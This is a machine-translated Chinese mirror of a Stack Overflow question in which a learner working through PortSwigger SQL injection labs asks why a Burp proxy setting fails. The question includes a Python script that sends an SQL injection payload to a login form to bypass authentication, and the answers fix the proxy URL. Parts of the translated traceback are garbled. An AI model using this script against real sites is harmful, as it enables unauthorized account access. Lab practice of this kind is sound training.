代理最大重试超过url
我在Youtube上学习SQL注入,然后用python编写脚本,使用kali linux作为虚拟机,遇到代理错误,除了堆栈溢出之外,我不知道应该搜索什么,没有任何有益的答案。下面是我的python代码:
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# the purpose of proxy is to proxy to myself in order to pass my request through burpsuit
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
def get_csrf_token(s, url):
r = s.get(url, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, 'html.parser')
csrf = soup.find("input")['value']
return csrf
def exploit_sqli(s, url, payload):
csrf = get_csrf_token(s, url)
data = {"csrf": csrf,
"username": payload,
"password": "randomtext"}
r = s.post(url, data=data, verify=False, proxies=proxies)
res = r.text
if "Log out" in res:
return True
else:
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
sqli_payload = sys.argv[2].strip()
except IndexError:
print('[-] Usage: %s <url> <sql-payload>' % sys.argv[0])
print('[-] Example: %s www.example.com "1=1"' % sys.argv[0])
s = requests.Session()
if exploit_sqli(s, url, sqli_payload):
print('[+] SQL injection successful! We have logged in as the administrator user.')
else:
print('[-] SQL injection unsuccessful.')正在遭受运行时错误的困扰,下面是我的跟踪跟踪:
文件跟踪(最近一次调用):文件"/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",行700,在urlopen self._prepare_proxy(康涅狄格州)文件"/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",行996中,在_prepare_proxy conn.connect()文件"/home/kali/.local/lib/python3.10/site-packages/urllib3/connection.py",行364中在connect "/home/kali/.local/lib/python3.10/site-packages/urllib3/util/ssl.py",= conn =self._connect_tls_proxy(主机名,康涅狄格)文件self.sock行499中,在connect_tls_proxy socket = ssl_wrap_socket(文件“/home/kali/.local/lib/python3.10/site-packages/urllib3/util/ssl.py”,行453 )中,在ssl_wrap_socket ssl_sock = ssl_wrap_socket_impl(sock,上下文,文件"/home/kali/.local/lib/python3.10/site-packages/urllib3/util/ssl.py",第495行,在_ssl_wrap_socket_impl返回ssl_context.wrap_socket(sock)文件"/usr/lib/python3.10/ssl.py“中,第513行,在wrap_socket返回self.sslsocket_class._create( File "/usr/lib/python3.10/ssl.py”)中,第1071行,在_create self.do_handshake() File "/usr/lib/python3.10/ssl.py“中,第1342行,在do_handshake self._sslobj.do_handshake() ssl.SSLError: SSL: WRONG_VERSION_NUMBER错误版本号(_ssl.c:997)中
在处理上述异常的过程中,发生了另一个异常:
回溯(最近一次调用):文件"/home/kali/.local/lib/python3.10/site-packages/requests/adapters.py",行489,在send =conn.urlopen中(文件"/home/kali/.local/lib/python3.10/site-packages/urllib3/connectionpool.py",行787,在urlopen resp =retries.increment中)(文件"/home/kali/.local/lib/python3.10/site-packages/urllib3/util/retry.py",行592,增量“/home/kali/.local/lib/python3.10/site-packages/urllib3/util/retry.py”,MaxRetryError(_pool,url,error或ResponseError(原因) urllib3.exceptions.MaxRetryError: urllib3.exceptions.MaxRetryError port=443):最大重试超过url: /login (由ProxyError引起)(“您的代理只使用HTTP而不是HTTPS,请尝试将代理URL更改为HTTP。见:https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy',SSLError(SSLError(1,'SSL: WRONG_VERSION_NUMBER错误版本号(_ssl.c:997)“))
在处理上述异常的过程中,发生了另一个异常:
追溯(最近一次调用):文件"/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",第43行,在if exploit_sqli(s,url,sqli_payload)中:文件"/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",第21行,在exploit_sqli csrf = get_csrf_token(s,url)文件"/home/kali/Desktop/machines/portSwiggerLabs/sqlInjection/lab-02/sql-lab-02.py",中第12行,在"/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",r= s.get(url,verify=False,proxies=proxies)文件第600行中,在get返回self.request("GET",url,**kwargs)文件"/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",第587行中,在request resp = self.send(prep,文件"/home/kali/.local/lib/python3.10/site-packages/requests/sessions.py",第701行,在send =adapter.send(请求,**kwargs)文件"/home/kali/.local/lib/python3.10/site-packages/requests/adapters.py",第559行中,在send (e,request=request) requests.exceptions.ProxyError: HTTPSConnectionPool(host='0a0000f503d3bb1ac1b8273000b600cb.web-security-academy.net',中port=443):最大重试超过url: /login (由ProxyError引起)(您的代理似乎只使用HTTP而不是HTTPS,请尝试将代理URL更改为HTTP。见:https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy',SSLError(SSLError(1,'SSL: WRONG_VERSION_NUMBER错误版本号(_ssl.c:997)“))
我试图检查我的本地主机(127.0.0.1) ip,如果它是另一个或可能没有配置或任何相关的,我没有得到任何结果。
回答 2
Stack Overflow用户
发布于 2022-10-28 17:33:13
经过几天的搜索后,我正在回答我的问题。
首先,我调试了我的代理没有收到来自python的请求,我搜索并找到了这个教程https://www.th3r3p0.com/random/python-requests-and-burp-suite.html来设置linux环境变量。
我把我的代码编辑成
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
因为它的缺省值也是http
Stack Overflow用户
发布于 2022-10-24 20:02:18
不完全确定,但通过查看堆栈跟踪的部分:
Caused by ProxyError('Your proxy appears to only use HTTP and not HTTPS, try changing your proxy URL to be HTTP. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy', SSLError(SSLError(1, '[SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:997)'))))我想说的是,只使用http url而不是https作为传递给脚本的参数。
https://stackoverflow.com/questions/74186169
复制相似问题
腾讯云开发者
